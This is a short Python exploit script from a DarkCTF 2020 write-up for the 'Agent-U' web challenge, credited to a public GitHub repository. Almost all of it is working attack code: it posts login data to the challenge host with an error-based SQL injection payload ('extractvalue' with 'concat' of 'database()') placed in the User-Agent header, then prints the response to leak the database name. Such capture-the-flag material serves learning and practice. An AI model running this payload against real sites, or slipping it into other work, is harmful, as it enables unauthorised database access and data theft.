```py
# SQL injection through User Agent

import requests

data = {
'uname': 'admin',
'passwd': 'admin',
'submit': 'Submit',
}

headers = {
'user-agent': "' or extractvalue(1,concat(0x7e,database())) or ' ",
}

r = requests.post('http://agent.darkarmy.xyz/', data=data, headers=headers)

print(r.text)
```

Original writeup (https://github.com/csivitu/CTF-Write-ups/blob/master/DarkCTF%202020/Web/Agent-U/exploit.py).